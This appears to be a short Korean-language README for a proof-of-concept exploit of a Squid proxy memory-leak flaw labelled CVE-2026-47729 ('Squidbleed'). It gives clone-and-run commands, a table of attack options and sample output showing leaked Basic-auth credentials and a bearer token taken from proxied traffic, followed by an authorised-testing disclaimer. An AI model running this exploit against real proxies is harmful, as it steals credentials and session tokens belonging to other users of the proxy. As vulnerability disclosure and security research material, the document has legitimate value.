
CVE-2026-47729
⚠️ Heartbleed의 고대 사촌, 1997년부터 Squid에 숨어있습니다.
LIST 응답을 잘라내는 악의적인 FTP 서버git clone https://github.com/0xBlackash/CVE-2026-47729.git
cd CVE-2026-47729
python3 CVE-2026-47729.py --proxy 127.0.0.1:3128
| 인자 | 기본값 | 설명 |
|---|---|---|
--proxy | 127.0.0.1:3128 | 대상 Squid 프록시 (호스트:포트) |
--ftp-port | 2222 | 로컬 악의적 FTP 서버 포트 |
-t, --threads | 4 | 동시 폴링 스레드 수 |
[PoC] Squidbleed CVE-2026-47729 by Ashraf Zaryouh (0xBlackash)
[ 14.78s] [BASIC] cGFzc3dvcmQxMjM6c2VjcmV0
decoded = admin:password123
[ 18.33s] [BEARER] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
이 PoC는 교육 및 승인된 테스트 목적으로만 제공됩니다.
소유하거나 테스트 권한이 있는 시스템에서만 책임감 있게 사용하십시오.
❤️ Ashraf Zaryouh "0xBlackash"가 제작했습니다